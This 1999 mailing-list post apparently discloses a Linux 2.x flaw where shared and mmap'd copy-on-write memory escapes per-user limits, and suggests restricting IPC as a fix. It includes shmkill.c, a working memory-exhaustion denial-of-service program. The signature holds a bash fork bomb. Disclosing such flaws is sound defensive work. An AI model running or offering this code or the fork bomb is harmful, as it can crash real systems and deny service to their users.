Date: Sun, 7 Mar 1999 01:41:25 +0100 From: Michal Zalewski Linux 2.x mmap vunerability Linux 2.0.36 has the similiar problem with copy-on-write pages allocated with mmap - as these pages are not accounted within per-user limits. Fortunately, it's less harmfull than (5), because memory will be freed as soon as process owning it will be killed. Exploit will be NOT posted - see below. -- shmkill.c -- extern int errno;int i,d=1;char*x;main(){while(1){x=shmat(shmget(0,10000000/ d,511),0,0);if(errno){d*=10;continue;}for(i=0;i<10000000/d;i++)if(*(x+i));}} -- eof -- Memory won't be freed even if luser's process will be killed, you have to use ipcrm, but there could be not enough memory to run anything :-( Under early 2.2.x, you have to run this program several times, to ensure pages are detached (in this state, they are onwerless ;-). The simpliest solution is to restrict for lusers IPC at all. Only a few programs uses IPC - probably only dosemu and ShoutCast ;> _______________________________________________________________________ Michal Zalewski [] [link / marchew] [ SYSADM] [Marchew Industries] ! [] bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]